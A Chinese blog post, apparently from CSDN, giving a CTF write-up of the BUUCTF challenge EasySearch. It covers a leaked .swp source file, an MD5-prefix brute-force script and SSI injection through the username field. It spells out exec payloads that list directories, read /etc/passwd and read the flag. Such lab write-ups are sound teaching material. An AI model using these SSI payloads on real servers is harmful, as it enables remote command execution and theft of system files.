[BJDCTF2020]EasySearch之SSI注入

最新推荐文章于 2024-07-16 20:09:05 发布
最新推荐文章于 2024-07-16 20:09:05 发布
阅读量2.5k 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: 安全 ssi注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/121523057
版权

开启靶机,题目提示easysearch。。。简单的寻找?应该不是考SQL注入类型的题,后来利用御剑扫出了隐藏文件/index.php.swp,这个文件是一个临时交换文件,用来备份缓冲区中的内容。如果文件正常退出,则自动删除此文件

访问获得源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {//以post方式提交username且非空
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {//md5后的password的前六位需要等于6d0bc1即可绕过
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

首先要求以post传入的username非空,且md5加密后的值前六位等于6d0bc1,然后在弹窗后会尝试打开一个SHTML文件

在SHTML文件中使用SSI指令引用其他的html文件(#include),服务器会将SHTML中包含的SSI指令解释,再传送给客户端。比如说框架是固定的,但是里面的文章,其他菜单等即可以用#include引用进来

什么是SSI?

SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令

注意:这里shtml需要抓包后才可以看到

首先利用垃圾py脚本跑一下,将6d0bc1带入脚本

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

爆出来的值也就是password登录,username随意输入即可,然后利用burp截包重放

访问弹出的/public/41d7dc9fba53098cbddc3741feecca758679ac56.shtml

回顾一下整个流程,首先password是不可更改的值,唯一可控的地方就是之前随意输入的username了,尝试在这里尝试上面学习的SSI注入

//直接执行服务器上的各种程序<#exec>

<!–#exec cmd="文件名称"–>

<!--#exec cmd="cat /etc/passwd"-->

<!–#exec cgi="文件名称"–>

将username对应的值改为<!--#exec cmd="ls ../"-->,然后访问生成的.shtml页面

获取flag的payload:

username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666  

访问/public/d3a4357b1d6452516fe4fde3f9393903ffaeddcd.shtml获得flag  

bbb07
关注
专栏目录
---------已搬运-------BUUCTF:[BJDCTF2020]EasySearch ----- ssi注入漏洞
Zero_Adam的博客
02-25 318
目录:一、自己做:二、不足&&学到的三、学习WP 一、自己做: 二、不足&&学到的 三、学习WP
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2764
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
[BJDCTF2020]EasySearch——ssi
m0_62879498的博客
05-14 458
[BJDCTF2020]EasySearch 1 和上一关相似 是 源码泄露 使用御剑对目录进行扫描 发现了 index.php.swp 0X01 源码分析 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars
玩转 Easysearch 语法
最新发布
infinilabs的博客
07-16 958
是一个基于 Apache Lucene 的开源分布式搜索和分析引擎,它被广泛应用于全文搜索、结构化搜索和分析等多种场景中。作为 Elasticsearch 的国产化替代方案,Easysearch不仅保持了与原生 Elasticsearch 的高度兼容性,还在功能、性能、稳定性和扩展性方面进行了全面提升。对于开发团队来说,从 Elasticsearch 切换到 Easysearch 不需要做任何业务代码的调整,确保了无缝衔接和平滑迁移。
[BJDCTF2020]EasySearch(ssi漏洞)
Yang_99的博客
09-26 393
1.首页御剑扫描可以发现有index.php.swp,可以查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
玩转Easysearch语法
改变世界,改变自己
07-06 1256
随着数据量的不断增加,高效的数据搜索和分析变得尤为重要。Elasticsearch 以其强大的全文搜索能力和灵活的数据处理能力成为行业标准。Easysearch 作为 Elasticsearch 的优化版本,不仅继承了其强大的功能,还在性能和安全性上做了进一步的提升,为企业提供了一个高效、稳定且易于迁移的搜索引擎解决方案。通过深入了解这些技术和实践其应用,开发者和企业能够更好地利用这些工具来应对现代数据挑战,推动业务的持续发展和创新。
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2983
buuctf 源码泄露 ssi远程命令执行漏洞
[BJDCTF2020]EasySearch
夜幕下的灯火阑珊的博客
05-13 1771
知识点 ApacheSSI远程命令执行漏洞 扫描到后台后swp文件泄露,访问一下得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+...
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 324
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
SSI注入
发哥微课堂
06-28 931
0x00:介绍 SSI 是 Server Side Includes 的缩写,即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include,包含一些公共的函数库等。那么 html 也有这种包含的机制,我们可以把它叫做 SSISSI 还有一些使用情况例如,页面需要动态加入一些内容,这些内容常见的比如自己的 ip 地址,自己的位置信息等。SSI 默认的文件类型是 sht...
拿走不谢!4100套iOS源码,40G!
ChatGPTer
11-10 1768
此时,只需要一张图就可以表达。
易搜 (EasySearch)-crx插件
03-19
易搜 (EasySearch) 对你选中的关键字提供快捷搜索功能。 易搜 (EasySearch) 对你选中的关键字提供快捷搜索功能。后续版本可以使用自定义搜索功能。 更新日志: 1.01 -增加英文语言支持; -增加自定义搜索功能; -优化核心代码; 1.00 -发布。 支持语言:English,中文 (简体),中文 (繁體)
INFINI Console 使用介绍
改变世界,改变自己
07-03 971
INFINI Console 是一个功能强大的数据管理和分析平台,其仪表盘页面提供了直观、简洁的界面,使用户可以快速了解系统状态并进行各种管理操作。本文将详细介绍仪表盘页面的各项功能。INFINI Console 是一个用于数据管理和分析的综合平台,其集群管理页面提供了对系统集群、节点、索引和主机的全面监控和管理功能。本文将详细介绍该页面的各项功能和特点。集群管理页面主要分为几个部分:顶部的功能选项卡、中部的集群列表、以及右侧的筛选和排序选项。Clusters (集群):显示当前系统中的所有集群。
Easysearch 帮助大型车企降本增效
infinilabs的博客
02-03 1046
最近某头部汽车集团需要针对当前 ES 集群进行优化,背景如下:ES 用于支撑包括核心营销系统、管理支持系统、财务类、IT 基础设施类、研发、自动驾驶等多个重要应用,合计超 50 余套集群,累计数据超 1.5PB。本文针对其中一个 ES 集群进行分享,该集群原本使用的是 ES 7.3.2 免费版,数据已经 130TB 了,14 个节点。写入数据时经常掉节点,写入性能也不稳定,当天的数据写不完。迫切需要新的解决方案。分析业务场景后总结需求要点:主要是写,很少查。审计需求,数据需要长期保存。
大量索引场景下 Easysearch 和 Elasticsearch 的吞吐量差异
infinilabs的博客
11-25 615
最近有客户在使用 Elasticsearch 搜索服务时发现集群有掉节点,并且有 master 收集节点信息超时的日志,节点的负载也很高,不只是 data 节点,master 和协调节点的 cpu 使用率都很高,看现象集群似乎遇到了性能瓶颈。查看了 Hot_threads, 发现大量线程被权限验证相关的类和方法占用,主要在 RBACEngine 和 AuthorizationService 两个类。并且不止协调节点和数据节点,master 节点居然也有那么多权限验证的操作?
INFINI Labs 产品更新 | 重磅推出 Easysearch v1.1
infinilabs的博客
05-16 378
INFINI Labs 产品更新啦,其中重要产品【INFINI Easysearch】正式亮相,100% 自主可控,内嵌压缩算法极大节省硬件成本,日志存储占用直接砍半。Easysearch 是一个分布式的近实时搜索与分析引擎,核心引擎基于开源的 Apache Lucene。Easysearch 衍生自基于开源协议 Apache 2.0 的 Elasticsearch 7.10.2 版本。欢迎大家下载体验和反馈。
国产搜索引擎崛起:Elasticsearch 国产化加速_elasticsearch国产化取代(1)
2401_84170323的博客
04-13 1102
Easysearch 作为 Elasticsearch 的国产化替代方案,不仅保持了与原生 Elasticsearch 的高度兼容性,还在功能、性能、稳定性和扩展性方面进行了全面提升。极限科技致力于为用户提供更加安全、可靠、高效的数据处理和分析解决方案。如有需要,请随时联系我们,让我们共同为祖国的信创事业添砖加瓦!
Easysearch 跨集群复制实战
infinilabs的博客
08-22 124
在之前的文章中,有通过网关实现容灾的案例。今天给大家介绍 Easysearch 的跨集群复制功能。跨集群复制使用 active-passive 模型,由目标集群主动拉取数据变化到本地,因此对源集群影响很小。
Easysearch 运行在 Kylin V10 (Lance)-aarch64上
infinilabs的博客
06-06 184
本文主要介绍在国产操作系统 Kylin V10 (Lance)-aarch64 上安装单机版 Easysearch/Console/Agent/Gateway/Loadgen。
服务器端包含技术SSI详解与应用
1. **重命名文件**:将Tomcat的`$CATALINA_HOME/server/lib/servlets-ssi.rename`文件改名为`servlets-ssi.jar`,这使得Tomcat能够识别并处理SSI请求。 2. **编辑配置文件**:在`$CATALINA_HOME/conf/context.xml`...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值